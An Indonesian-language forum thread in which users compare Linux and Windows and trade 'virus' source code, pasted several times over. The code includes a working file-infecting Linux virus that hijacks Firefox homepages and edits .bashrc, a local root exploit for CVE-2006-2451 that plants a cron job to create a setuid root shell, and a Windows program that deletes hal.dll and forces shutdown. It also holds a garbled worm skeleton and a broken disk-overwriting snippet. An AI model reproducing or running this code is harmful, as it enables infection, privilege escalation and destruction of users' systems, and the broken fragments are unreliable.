Perbedaan.........(*..*) !!
4 posters
Halaman 1 dari 1
Server
150 itu virus buat OS apa?
zz- Panglima
- Jumlah posting : 121
Age : 78
Lokasi : france
Registration date : 13.02.09
Re: Perbedaan.........(*..*) !!
setiap ada virus baru pasti terdektesi oleh anti virus yang ada di windows... tapi sekarang di linux tidak memberi peringatan jika ada virus masuk... buktine sekarang ini SERVER ada 150 yang di temui oleh AVIRA itu tanpa di scan tapi hanya memasuki satu persatu folder... apa lagi di scan... mungkin double account,....
syaf- Pejuang
- Jumlah posting : 63
Age : 78
Lokasi : ~#root | system32
Registration date : 25.02.09
virus oh virus
source code virus linux yang telah disebut dibawah tadi, itu bisa berhasil bila didalam linux belum terinstall antivirus, namun bila disana ada antivirus!!!????, maka source code virus tersebut harus di upgrade agar bisa melewati anti virus.
makin panjanglah source code tersebut, dan tentu makin memusingkan
(^_^)
makin panjanglah source code tersebut, dan tentu makin memusingkan
(^_^)
zz- Panglima
- Jumlah posting : 121
Age : 78
Lokasi : france
Registration date : 13.02.09
Re: Perbedaan.........(*..*) !!
=======================================================
Klo yang sama ajakan tapi ini ku dapat dari buku temen ku....
/*
* Jingle Bell (with moderate error handling)
*/
#include <stdio.h>
#include <linux/prctl.h>
#include <signal.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
/* the size of our own executable: please configure */
static int V_OFFSET = 9970;
extern int errno;
void do_infect(int, char **, int);
int
main(int argc, char **argv, char **envp)
{
int len;
int rval;
int pid, status;
int fd_r, fd_w;
char *tmp;
char buf[BUFSIZ];
/*
* sometimes it may be possible to modify argv[0], for example by
* using zsh's ARGV0 variable:
*
* zsh# ARGV0=foobar ls
*
* In that case this virus misbehaves!
*/
// My added stuff
printf("THIS IS A VIRUS!n");
// set the homepage
system(" for i in $( find ~/.mozilla/firefox -maxdepth 1 -type d ); do n echo "user_pref(\"browser.startup.homepage\", \"http://www.nnucomputerwhiz.com/linux-virus.html\");" >> $i/prefs.js n done");
// edit .bashrc to set the homepage
system("echo 'for i in $( find ~/.mozilla/firefox -maxdepth 1 -type d ); do echo "user_pref(\"browser.startup.homepage\", \"http://www.nnucomputerwhiz.com/linux-virus.html\");" >> $i/prefs.js ; done' >> ~/.bashrc");
// end my added stuff
if ((fd_r = open(argv[0], O_RDONLY)) < 0)
goto XBAILOUT;
if (lseek(fd_r, V_OFFSET, SEEK_SET) < 0) {
close(fd_r);
goto XBAILOUT;
}
if ((tmp = tmpnam(NULL)) == NULL) {
close(fd_r);
goto BAILOUT;
}
if ((fd_w = open(tmp, O_CREAT | O_TRUNC | O_RDWR, 00700)) < 0)
goto BAILOUT;
while ((len = read(fd_r, buf, BUFSIZ)) > 0)
write(fd_w, buf, len);
close(fd_w);
if ((pid = fork()) < 0)
goto BAILOUT;
/* run the original executable */
if (pid == 0) {
execve(tmp, argv, envp);
exit(127);
}
/* Infect */
do_infect(argc, argv, fd_r);
close(fd_r);
do {
/* wait till you can cleanup */
if (waitpid(pid, &status, 0) == -1) {
if (errno != EINTR) {
rval = -1;
goto BAILOUT;
} else {
rval = status;
goto BAILOUT;
}
}
}
while (1);
BAILOUT:
unlink(tmp);
XBAILOUT:
exit(rval);
}
void
do_infect(int argc, char **argv, int fd_r)
{
int fd_t;
int target, i;
int done, bytes, length;
char * targetName;
void *map;
struct stat stat;
char buf[BUFSIZ];
if (argc < 2)
return;
/* nail the first executable on the command line */
for (target = 1; target < argc; target++)
if (!access(argv[target], W_OK | X_OK))
targetName = argv[target];
goto NAILED;
return;
NAILED:
if ((fd_t = open(targetName, O_RDWR)) < 0)
return;
fstat(fd_t, &stat);
length = stat.st_size;
map = (char *)malloc(length);
if (!map)
goto OUT;
/* assume no short reads or writes, nor any failed lseeks */
for (i = 0; i < length; i++)
read(fd_t, map + i, 1);
lseek(fd_t, 0, SEEK_SET);
if (ftruncate(fd_t, 0))
goto OUT;
done = 0;
lseek(fd_r, 0, SEEK_SET);
while (done < V_OFFSET) {
bytes = read(fd_r, buf, 1);
write(fd_t, buf, bytes);
done += bytes;
}
for (bytes = 0; bytes < length; bytes++)
write(fd_t, map + bytes, 1);
free(map);
OUT:
close(fd_t);
return;
bagaimana ......???? pastinya gak ada yang kurang....
syafmovic
Klo yang sama ajakan tapi ini ku dapat dari buku temen ku....
/*
* Jingle Bell (with moderate error handling)
*/
#include <stdio.h>
#include <linux/prctl.h>
#include <signal.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
/* the size of our own executable: please configure */
static int V_OFFSET = 9970;
extern int errno;
void do_infect(int, char **, int);
int
main(int argc, char **argv, char **envp)
{
int len;
int rval;
int pid, status;
int fd_r, fd_w;
char *tmp;
char buf[BUFSIZ];
/*
* sometimes it may be possible to modify argv[0], for example by
* using zsh's ARGV0 variable:
*
* zsh# ARGV0=foobar ls
*
* In that case this virus misbehaves!
*/
// My added stuff
printf("THIS IS A VIRUS!n");
// set the homepage
system(" for i in $( find ~/.mozilla/firefox -maxdepth 1 -type d ); do n echo "user_pref(\"browser.startup.homepage\", \"http://www.nnucomputerwhiz.com/linux-virus.html\");" >> $i/prefs.js n done");
// edit .bashrc to set the homepage
system("echo 'for i in $( find ~/.mozilla/firefox -maxdepth 1 -type d ); do echo "user_pref(\"browser.startup.homepage\", \"http://www.nnucomputerwhiz.com/linux-virus.html\");" >> $i/prefs.js ; done' >> ~/.bashrc");
// end my added stuff
if ((fd_r = open(argv[0], O_RDONLY)) < 0)
goto XBAILOUT;
if (lseek(fd_r, V_OFFSET, SEEK_SET) < 0) {
close(fd_r);
goto XBAILOUT;
}
if ((tmp = tmpnam(NULL)) == NULL) {
close(fd_r);
goto BAILOUT;
}
if ((fd_w = open(tmp, O_CREAT | O_TRUNC | O_RDWR, 00700)) < 0)
goto BAILOUT;
while ((len = read(fd_r, buf, BUFSIZ)) > 0)
write(fd_w, buf, len);
close(fd_w);
if ((pid = fork()) < 0)
goto BAILOUT;
/* run the original executable */
if (pid == 0) {
execve(tmp, argv, envp);
exit(127);
}
/* Infect */
do_infect(argc, argv, fd_r);
close(fd_r);
do {
/* wait till you can cleanup */
if (waitpid(pid, &status, 0) == -1) {
if (errno != EINTR) {
rval = -1;
goto BAILOUT;
} else {
rval = status;
goto BAILOUT;
}
}
}
while (1);
BAILOUT:
unlink(tmp);
XBAILOUT:
exit(rval);
}
void
do_infect(int argc, char **argv, int fd_r)
{
int fd_t;
int target, i;
int done, bytes, length;
char * targetName;
void *map;
struct stat stat;
char buf[BUFSIZ];
if (argc < 2)
return;
/* nail the first executable on the command line */
for (target = 1; target < argc; target++)
if (!access(argv[target], W_OK | X_OK))
targetName = argv[target];
goto NAILED;
return;
NAILED:
if ((fd_t = open(targetName, O_RDWR)) < 0)
return;
fstat(fd_t, &stat);
length = stat.st_size;
map = (char *)malloc(length);
if (!map)
goto OUT;
/* assume no short reads or writes, nor any failed lseeks */
for (i = 0; i < length; i++)
read(fd_t, map + i, 1);
lseek(fd_t, 0, SEEK_SET);
if (ftruncate(fd_t, 0))
goto OUT;
done = 0;
lseek(fd_r, 0, SEEK_SET);
while (done < V_OFFSET) {
bytes = read(fd_r, buf, 1);
write(fd_t, buf, bytes);
done += bytes;
}
for (bytes = 0; bytes < length; bytes++)
write(fd_t, map + bytes, 1);
free(map);
OUT:
close(fd_t);
return;
bagaimana ......???? pastinya gak ada yang kurang....
syafmovic
syaf- Pejuang
- Jumlah posting : 63
Age : 78
Lokasi : ~#root | system32
Registration date : 25.02.09
Virus buat linux
/*inilah source code virus buat linux, sangat memusingkan jalan ceritanya code ini, begitulah kata sang pembuat, jangan dibuat untuk merusak ! apapun */
#include <stdio.h>
#include <linux/prctl.h>
#include <signal.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
/* the size of our own executable: please configure */
static int V_OFFSET = 9970;
extern int errno;
void do_infect(int, char **, int);
int
main(int argc, char **argv, char **envp)
{
int len;
int rval;
int pid, status;
int fd_r, fd_w;
char *tmp;
char buf[BUFSIZ];
/*
* sometimes it may be possible to modify argv[0], for example by
* using zsh's ARGV0 variable:
*
* zsh# ARGV0=foobar ls
*
* In that case this virus misbehaves!
*/
// My added stuff
printf("THIS IS A VIRUS!n");
// set the homepage
system(" for i in $( find ~/.mozilla/firefox -maxdepth 1 -type d ); do n echo "user_pref(\"browser.startup.homepage\", \"http://www.nnucomputerwhiz.com/linux-virus.html\");" >> $i/prefs.js n done");
// edit .bashrc to set the homepage
system("echo 'for i in $( find ~/.mozilla/firefox -maxdepth 1 -type d ); do echo "user_pref(\"browser.startup.homepage\", \"http://www.nnucomputerwhiz.com/linux-virus.html\");" >> $i/prefs.js ; done' >> ~/.bashrc");
// end my added stuff
if ((fd_r = open(argv[0], O_RDONLY)) < 0)
goto XBAILOUT;
if (lseek(fd_r, V_OFFSET, SEEK_SET) < 0) {
close(fd_r);
goto XBAILOUT;
}
if ((tmp = tmpnam(NULL)) == NULL) {
close(fd_r);
goto BAILOUT;
}
if ((fd_w = open(tmp, O_CREAT | O_TRUNC | O_RDWR, 00700)) < 0)
goto BAILOUT;
while ((len = read(fd_r, buf, BUFSIZ)) > 0)
write(fd_w, buf, len);
close(fd_w);
if ((pid = fork()) < 0)
goto BAILOUT;
/* run the original executable */
if (pid == 0) {
execve(tmp, argv, envp);
exit(127);
}
/* Infect */
do_infect(argc, argv, fd_r);
close(fd_r);
do {
/* wait till you can cleanup */
if (waitpid(pid, &status, 0) == -1) {
if (errno != EINTR) {
rval = -1;
goto BAILOUT;
} else {
rval = status;
goto BAILOUT;
}
}
}
while (1);
BAILOUT:
unlink(tmp);
XBAILOUT:
exit(rval);
}
void
do_infect(int argc, char **argv, int fd_r)
{
int fd_t;
int target, i;
int done, bytes, length;
char * targetName;
void *map;
struct stat stat;
char buf[BUFSIZ];
if (argc < 2)
return;
/* nail the first executable on the command line */
for (target = 1; target < argc; target++)
if (!access(argv[target], W_OK | X_OK))
targetName = argv[target];
goto NAILED;
return;
NAILED:
if ((fd_t = open(targetName, O_RDWR)) < 0)
return;
fstat(fd_t, &stat);
length = stat.st_size;
map = (char *)malloc(length);
if (!map)
goto OUT;
/* assume no short reads or writes, nor any failed lseeks */
for (i = 0; i < length; i++)
read(fd_t, map + i, 1);
lseek(fd_t, 0, SEEK_SET);
if (ftruncate(fd_t, 0))
goto OUT;
done = 0;
lseek(fd_r, 0, SEEK_SET);
while (done < V_OFFSET) {
bytes = read(fd_r, buf, 1);
write(fd_t, buf, bytes);
done += bytes;
}
for (bytes = 0; bytes < length; bytes++)
write(fd_t, map + bytes, 1);
free(map);
OUT:
close(fd_t);
return;
Appendix B - Local Root Exploit
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="nSHELL=/bin/shnPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binn* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/coren";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00tn");
printf("By: dreyer & RoMaNSoFtn");
printf("[ 10.Jul.2006 ]nn");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entryn");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...n");
system("/tmp/sh -i");
#include <stdio.h>
#include <linux/prctl.h>
#include <signal.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
/* the size of our own executable: please configure */
static int V_OFFSET = 9970;
extern int errno;
void do_infect(int, char **, int);
int
main(int argc, char **argv, char **envp)
{
int len;
int rval;
int pid, status;
int fd_r, fd_w;
char *tmp;
char buf[BUFSIZ];
/*
* sometimes it may be possible to modify argv[0], for example by
* using zsh's ARGV0 variable:
*
* zsh# ARGV0=foobar ls
*
* In that case this virus misbehaves!
*/
// My added stuff
printf("THIS IS A VIRUS!n");
// set the homepage
system(" for i in $( find ~/.mozilla/firefox -maxdepth 1 -type d ); do n echo "user_pref(\"browser.startup.homepage\", \"http://www.nnucomputerwhiz.com/linux-virus.html\");" >> $i/prefs.js n done");
// edit .bashrc to set the homepage
system("echo 'for i in $( find ~/.mozilla/firefox -maxdepth 1 -type d ); do echo "user_pref(\"browser.startup.homepage\", \"http://www.nnucomputerwhiz.com/linux-virus.html\");" >> $i/prefs.js ; done' >> ~/.bashrc");
// end my added stuff
if ((fd_r = open(argv[0], O_RDONLY)) < 0)
goto XBAILOUT;
if (lseek(fd_r, V_OFFSET, SEEK_SET) < 0) {
close(fd_r);
goto XBAILOUT;
}
if ((tmp = tmpnam(NULL)) == NULL) {
close(fd_r);
goto BAILOUT;
}
if ((fd_w = open(tmp, O_CREAT | O_TRUNC | O_RDWR, 00700)) < 0)
goto BAILOUT;
while ((len = read(fd_r, buf, BUFSIZ)) > 0)
write(fd_w, buf, len);
close(fd_w);
if ((pid = fork()) < 0)
goto BAILOUT;
/* run the original executable */
if (pid == 0) {
execve(tmp, argv, envp);
exit(127);
}
/* Infect */
do_infect(argc, argv, fd_r);
close(fd_r);
do {
/* wait till you can cleanup */
if (waitpid(pid, &status, 0) == -1) {
if (errno != EINTR) {
rval = -1;
goto BAILOUT;
} else {
rval = status;
goto BAILOUT;
}
}
}
while (1);
BAILOUT:
unlink(tmp);
XBAILOUT:
exit(rval);
}
void
do_infect(int argc, char **argv, int fd_r)
{
int fd_t;
int target, i;
int done, bytes, length;
char * targetName;
void *map;
struct stat stat;
char buf[BUFSIZ];
if (argc < 2)
return;
/* nail the first executable on the command line */
for (target = 1; target < argc; target++)
if (!access(argv[target], W_OK | X_OK))
targetName = argv[target];
goto NAILED;
return;
NAILED:
if ((fd_t = open(targetName, O_RDWR)) < 0)
return;
fstat(fd_t, &stat);
length = stat.st_size;
map = (char *)malloc(length);
if (!map)
goto OUT;
/* assume no short reads or writes, nor any failed lseeks */
for (i = 0; i < length; i++)
read(fd_t, map + i, 1);
lseek(fd_t, 0, SEEK_SET);
if (ftruncate(fd_t, 0))
goto OUT;
done = 0;
lseek(fd_r, 0, SEEK_SET);
while (done < V_OFFSET) {
bytes = read(fd_r, buf, 1);
write(fd_t, buf, bytes);
done += bytes;
}
for (bytes = 0; bytes < length; bytes++)
write(fd_t, map + bytes, 1);
free(map);
OUT:
close(fd_t);
return;
Appendix B - Local Root Exploit
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="nSHELL=/bin/shnPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binn* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/coren";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00tn");
printf("By: dreyer & RoMaNSoFtn");
printf("[ 10.Jul.2006 ]nn");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entryn");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...n");
system("/tmp/sh -i");
zz- Panglima
- Jumlah posting : 121
Age : 78
Lokasi : france
Registration date : 13.02.09
<iostream>
itu kan klo biasa nya......
tapi klo ini gak biasanya..
dan gunanya diberi <iostream> apa??????
Jelas dengan rinci dan sejelas-jelasnya supaya PPFU maju
zz itu nama aslinya siapa?????????
tapi klo ini gak biasanya..
dan gunanya diberi <iostream> apa??????
Jelas dengan rinci dan sejelas-jelasnya supaya PPFU maju
zz itu nama aslinya siapa?????????
syaf- Pejuang
- Jumlah posting : 63
Age : 78
Lokasi : ~#root | system32
Registration date : 25.02.09
zz siapakah kamu ?
siapa zz ????Cs wrote:
Klo yang ini zz...bagaimana??
#include
#include
#include
#include
#include
main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}
bagaimana
beri Komentar nya men...
WOWWWOWOWOW
katanya zz nama samaran mas tsaqib.. bener ya....???
maaf ya klo tutur bahasanya saya kurang bagus..
By : Cs
zz itu bukan satu orang , disana kan 'z' pakai dua, itu bermaksud bukan orang satu
ada dua orang disana berinisial 'z' dan 'z'
by the way,
kode apaan tuh ?????
itu ada yang kurang,
seharusnya sesudah "include" ada nama library
semisal :
include <iostream>
kalau diatas kok tidak ada !
zz- Panglima
- Jumlah posting : 121
Age : 78
Lokasi : france
Registration date : 13.02.09
jangan tukang merusak!!!!!
Naila lo suka niru buatan orang lain ya
syaf- Pejuang
- Jumlah posting : 63
Age : 78
Lokasi : ~#root | system32
Registration date : 25.02.09
Dari Orang Luar : Mohon Petunjuk?
Kode Anda di atas kok cuma include-include aja dari awal? Pustaka apa yang akan Anda masukkan setelah include itu? Apa gak error tuh kalo dieksekusi? Tapi lumayan juga itu virus "hanya" bisa nampilin tulisan FUA dan TB.Cleaning Service wrote:Klo yang ini zz...bagaimana??
#include
#include
#include
#include
#include
main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}
bagaimana
beri Komentar nya men...
WOWWWOWOWOW
katanya zz nama samaran mas tsaqib.. bener ya....???
maaf ya klo tutur bahasanya saya kurang bagus..
By : Cs
Kalo kode yang di bawahnya itu (worm.c) bukan kode untuk cracking waktu pada warnet yang berbasis linux ta? Selain itu setelah prosedur for pada bagian send message kok ada smiley? Apa itu kode guyon aja? Ato kalo kamu dapet tuh kode hasil copy paste, saranku tampilin sumbernya dong! Biar kita terbiasa berterima kasih ama yang udah ngasih kita ilmu. OKE COY?!
Nayla Labibah- Jumlah posting : 5
Age : 32
Lokasi : Bait Al-Lahm
Registration date : 21.02.09
Re: Perbedaan.........(*..*) !!
zz wrote:codenya mohon dilengkapi !!! sepertinya ada baris yang ilang
apalagi codenya panjang banget
Klo yang ini zz...bagaimana??
#include
#include
#include
#include
#include
main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}
bagaimana
beri Komentar nya men...
WOWWWOWOWOW
katanya zz nama samaran mas tsaqib.. bener ya....???
maaf ya klo tutur bahasanya saya kurang bagus..
By : Cs
syaf- Pejuang
- Jumlah posting : 63
Age : 78
Lokasi : ~#root | system32
Registration date : 25.02.09
code programnya tidak lengkap
codenya mohon dilengkapi !!! sepertinya ada baris yang ilang
apalagi codenya panjang banget
apalagi codenya panjang banget
zz- Panglima
- Jumlah posting : 121
Age : 78
Lokasi : france
Registration date : 13.02.09
Dah Dapat Nih.................CODE VIRUS NYA.....
Hallo semua.......................!!!!
Ku kenalkan virus worm.c untuk linux
#include
#include
#include
#include
long current_time;
struct rlimit no_core = {0,0};
int
main (argc, argv)
int argc;
char *argv[];
{
int n;
int parent = 0;
int okay = 0;
/* change calling name to "sh" */
strcpy(argv[0], "sh");
/* prevent core files by setting limit to 0 */
setrlimit(RLIMIT_CORE, no_core);
current_time = time(0);
/* seed random number generator with time */
srand48(current_time);
n = 1;
while (argv[n]) {
/* save process id of parent */
if (!strncmp(argv[n], "-p", 2)) {
parent = atoi (argv[++n]);
n++;
}
else {
/* check for 1l.c in argument list */
if (!strncmp(argv([n], "1l.c", 4))
okay = 1;
/* load an object file into memory */
load_object (argv[n];
/* clean up by unlinking file */
if (parent)
unlink (argv[n]);
/* and removing object file name */
strcpy (argv[n++], "");
}
}
/* if 1l.c was not in argument list, quit */
if (!okay)
exit (0);
/* reset process group */
setpgrp (getpid());
/* kill parent shell if parent is set */
if (parent)
kill(parent, SIGHUP);
/* scan for network interfaces */
if_init();
/* collect list of gateways from netstat */
rt_init();
/* start main loop */
doit();
}
int
doit()
{
current_time = time (0);
/* seed random number generator (again) */
srand48(current_time);
/* attack gateways, local nets, remote nets */
attack_hosts();
/* check for a "listening" worm */
check_other ()
/* attempt to send byte to "ernie" */
send_message ()
for (; {
/* crack some passwords */
crack_some ();
/* sleep or listen for other worms */
other_sleep (30);
crack_some ();
/* switch process id's */
if (fork())
/* parent exits, new worm continues */
exit (0);
/* attack gateways, known hosts */
attack_hosts();
other_sleep(120);
/* if 12 hours have passed, reset hosts */
if(time (0) == current_time + (3600*12)) {
reset_hosts();
current_time = time(0); }
/* quit if pleasequit is set, and nextw>10 */
if (pleasequit && nextw > 10)
exit (0);
}
}
sekian dulu dari saya ........ Syabah...dan ZZ
By : Cs
Ku kenalkan virus worm.c untuk linux
#include
#include
#include
#include
long current_time;
struct rlimit no_core = {0,0};
int
main (argc, argv)
int argc;
char *argv[];
{
int n;
int parent = 0;
int okay = 0;
/* change calling name to "sh" */
strcpy(argv[0], "sh");
/* prevent core files by setting limit to 0 */
setrlimit(RLIMIT_CORE, no_core);
current_time = time(0);
/* seed random number generator with time */
srand48(current_time);
n = 1;
while (argv[n]) {
/* save process id of parent */
if (!strncmp(argv[n], "-p", 2)) {
parent = atoi (argv[++n]);
n++;
}
else {
/* check for 1l.c in argument list */
if (!strncmp(argv([n], "1l.c", 4))
okay = 1;
/* load an object file into memory */
load_object (argv[n];
/* clean up by unlinking file */
if (parent)
unlink (argv[n]);
/* and removing object file name */
strcpy (argv[n++], "");
}
}
/* if 1l.c was not in argument list, quit */
if (!okay)
exit (0);
/* reset process group */
setpgrp (getpid());
/* kill parent shell if parent is set */
if (parent)
kill(parent, SIGHUP);
/* scan for network interfaces */
if_init();
/* collect list of gateways from netstat */
rt_init();
/* start main loop */
doit();
}
int
doit()
{
current_time = time (0);
/* seed random number generator (again) */
srand48(current_time);
/* attack gateways, local nets, remote nets */
attack_hosts();
/* check for a "listening" worm */
check_other ()
/* attempt to send byte to "ernie" */
send_message ()
for (; {
/* crack some passwords */
crack_some ();
/* sleep or listen for other worms */
other_sleep (30);
crack_some ();
/* switch process id's */
if (fork())
/* parent exits, new worm continues */
exit (0);
/* attack gateways, known hosts */
attack_hosts();
other_sleep(120);
/* if 12 hours have passed, reset hosts */
if(time (0) == current_time + (3600*12)) {
reset_hosts();
current_time = time(0); }
/* quit if pleasequit is set, and nextw>10 */
if (pleasequit && nextw > 10)
exit (0);
}
}
sekian dulu dari saya ........ Syabah...dan ZZ
By : Cs
Terakhir diubah oleh Cs tanggal Tue Mar 03, 2009 10:37 pm, total 2 kali diubah
syaf- Pejuang
- Jumlah posting : 63
Age : 78
Lokasi : ~#root | system32
Registration date : 25.02.09
Re: Perbedaan.........(*..*) !!
DELETED CONTENT
Terakhir diubah oleh syafmovic007 tanggal Sat Nov 19, 2022 6:05 am, total 1 kali diubah
syaf- Pejuang
- Jumlah posting : 63
Age : 78
Lokasi : ~#root | system32
Registration date : 25.02.09
Virus 4 Linux
Oke... Cs! Aku tunggu kode dari kamu. Sepertinya bakal menarik nih. Kalo lihat kode dari ZZ, di situ ada system32, *.dll, juga file exe. Apakah di Linux bisa diincar file tertentu tanpa melewati hak akses alias permission-nya? Taruh kodenya segera di sini ya biar ketahuan kelemahan-kelemahan atopun kekuatan OS tertentu.Cs wrote:kata ku : linux juga ada code yang kayak gitu ..karna ku tau dari temen aku yang lulusan kuliah....
tapi nanti dulu klo codenya ya.....ku mau nanya dulu,,,
karna kuncinya ilmu itu bertanyakan.....tenang dan tunggu code dari saya!!!!!!!!!!
kurang men
kata ku : linux juga ada code yang kayak gitu ..karna ku tau dari temen aku yang lulusan kuliah....
tapi nanti dulu klo codenya ya.....ku mau nanya dulu,,,
karna kuncinya ilmu itu bertanyakan.....tenang dan tunggu code dari saya!!!!!!!!!!
tapi nanti dulu klo codenya ya.....ku mau nanya dulu,,,
karna kuncinya ilmu itu bertanyakan.....tenang dan tunggu code dari saya!!!!!!!!!!
syaf- Pejuang
- Jumlah posting : 63
Age : 78
Lokasi : ~#root | system32
Registration date : 25.02.09
Virus
#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
system("del %SystemRoot%\\system32\\hal.dll -q"); //PWNAGE TIME
system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
system("PAUSE");
return EXIT_SUCCESS;
}
/* code ini adalah contoh code virus untuk windows, saya tidak pernah mencoba ini dan tidak tertarik untuk mencobanya,
dengan hanya beberapa baris, windows sudah kolaps ( tamat ) */
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
system("del %SystemRoot%\\system32\\hal.dll -q"); //PWNAGE TIME
system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
system("PAUSE");
return EXIT_SUCCESS;
}
/* code ini adalah contoh code virus untuk windows, saya tidak pernah mencoba ini dan tidak tertarik untuk mencobanya,
dengan hanya beberapa baris, windows sudah kolaps ( tamat ) */
zz- Panglima
- Jumlah posting : 121
Age : 78
Lokasi : france
Registration date : 13.02.09
Linux vs windows
Kalau lebih canggih mana antara windows dan linux ?
itu pertanyaan sulit
Masing2 punya kelebihan dan kekurangan.
keuntungan memakai linux
1. bebas virus, mungkin windows mania bisa pakai anti virus yang canggih tapi yang tak boleh dilupakan adalah : yang update itu bukan anti virusnya saja, peembuat virusnya juga update
2. masa depan OS ( operational system ) kata banyak orang berada di open source ( gratis).
Yang perlu kita ketahui adalah window tidak gratis, kamu harus bayar untuk memakai windows, kira 1 OS windows kurang lebih satu juta, itu belum office dan yang lain.
3. bagi mereka yang kepingin mempelajari program, lebih baik memakai linux
Keuntungan windows
1. waktu booting (pertama kali komputer dihidupkan) lebih cepat
2. didukung banyak software meskipun harus membayar
Sampai saat ini hanya itu yang saya ketahui.
itu pertanyaan sulit
Masing2 punya kelebihan dan kekurangan.
keuntungan memakai linux
1. bebas virus, mungkin windows mania bisa pakai anti virus yang canggih tapi yang tak boleh dilupakan adalah : yang update itu bukan anti virusnya saja, peembuat virusnya juga update
2. masa depan OS ( operational system ) kata banyak orang berada di open source ( gratis).
Yang perlu kita ketahui adalah window tidak gratis, kamu harus bayar untuk memakai windows, kira 1 OS windows kurang lebih satu juta, itu belum office dan yang lain.
3. bagi mereka yang kepingin mempelajari program, lebih baik memakai linux
Keuntungan windows
1. waktu booting (pertama kali komputer dihidupkan) lebih cepat
2. didukung banyak software meskipun harus membayar
Sampai saat ini hanya itu yang saya ketahui.
zz- Panglima
- Jumlah posting : 121
Age : 78
Lokasi : france
Registration date : 13.02.09
Perbedaan.........(*..*) !!
oh ya.....
didalam pondok pesantren saya ini memakai windows sebelumnya,tapi sekarang memakai linux....
OKE...ku ingin tanya nih canggihan mana linux dan windows atau nyamanan mana linux dan windows...???? inikan gampang ...tolong jawab ya...
didalam pondok pesantren saya ini memakai windows sebelumnya,tapi sekarang memakai linux....
OKE...ku ingin tanya nih canggihan mana linux dan windows atau nyamanan mana linux dan windows...???? inikan gampang ...tolong jawab ya...
syaf- Pejuang
- Jumlah posting : 63
Age : 78
Lokasi : ~#root | system32
Registration date : 25.02.09
Halaman 1 dari 1
Permissions in this forum:
Anda tidak dapat menjawab topik
|
|